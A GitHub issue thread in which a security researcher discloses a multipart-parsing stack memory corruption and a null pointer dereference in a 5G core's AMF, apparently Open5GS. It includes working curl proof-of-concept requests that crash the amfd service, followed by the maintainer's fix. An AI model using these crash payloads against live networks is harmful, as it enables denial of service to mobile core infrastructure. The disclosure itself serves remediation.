Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

memory corruption and null pointer dereference #1247

Closed
leommxj opened this issue Nov 16, 2021 · 2 comments
Closed

memory corruption and null pointer dereference #1247

leommxj opened this issue Nov 16, 2021 · 2 comments

Comments

@leommxj
Copy link

leommxj commented Nov 16, 2021

Thanks for the great project first. I have found some vulnerabilities during reading the source code.

memory corruption in parse_multipart

when nf receive sbi(http2) message with Content-Type: multipart/releated , parse_multipart in lib/sbi/message.c will try to parse all parts in the request, but the struct multipart_parser_data_s only have OGS_SBI_MAX_NUM_OF_PART which is 8 member, and this will cause a memory corruption to stack memory.
below is a poc requests to crash the amfd(which listen on 127.0.0.5:7777):

echo -ne '--aboundary\r\nContent-Type: application/json\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json1\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json1\r\n\r\ndata3\r\n--aboundary--\r\n' |curl -X POST --http2-prior-knowledge  http://127.0.0.5:7777/namf-comm/v1/ue-contexts -H "Content-Type: multipart/related; boundary=--aboundary" --data-binary @-

null pointer dereference

namf-comm/v1/ue-contexts/imsi-901700000000001/n1-n2-messages in amf will call amf_namf_comm_handle_n1_n2_message_transferin src/amf/namf-handler.c
OpenAPI_n1_n2_message_transfer_req_data_parseFromJSON can parse a data without n2_info_container and return n2_info_container as null. This will skip the if on line 113

    n2InfoContainer = N1N2MessageTransferReqData->n2_info_container;
    if (n2InfoContainer) {
        smInfo = n2InfoContainer->sm_info;
        if (!smInfo) {
            ogs_error("No smInfo");
            return OGS_ERROR;
        }
        n2InfoContent = smInfo->n2_info_content;
        if (!n2InfoContent) {
            ogs_error("No n2InfoContent");
            return OGS_ERROR;
        }

this case will not set n2InfoContent , but on line 156 , n2InfoContent is being dereferenced

switch (n2InfoContent->ngap_ie_type) {

below is a poc crash amfd(this requires a live ue context, i was using ueransim to simulate a imsi-901700000000001 here):

curl -X POST --http2-prior-knowledge http://127.0.0.5:7777/namf-comm/v1/ue-contexts/imsi-901700000000001/n1-n2-messages -d '{
  "skipInd": false,
  "lastMsgIndication": true,
  "pduSessionId": 1,
  "lcsCorrelationId": "string",
  "ppi": 7,
  "5qi": 1,
  "n1n2FailureTxfNotifURI": "string",
  "smfReallocationInd": false,
  "supportedFeatures": "string"
}

leommxj from Chaitin Security Research Lab.

acetcom added a commit that referenced this issue Nov 16, 2021
1. memory corruption
- Overflow num_of_part in SBI message
2. null pointer dereference
- n2InfoContent->ngap_ie_type
@acetcom
Copy link
Member

acetcom commented Nov 16, 2021

Hi @leommxj

It's nice catch. I've fixed it and upated it to the main branch on github.

Thanks a lot!
Sukchan

@leommxj
Copy link
Author

leommxj commented Nov 17, 2021

That was fast. Great Work.

@leommxj leommxj closed this as completed Nov 17, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants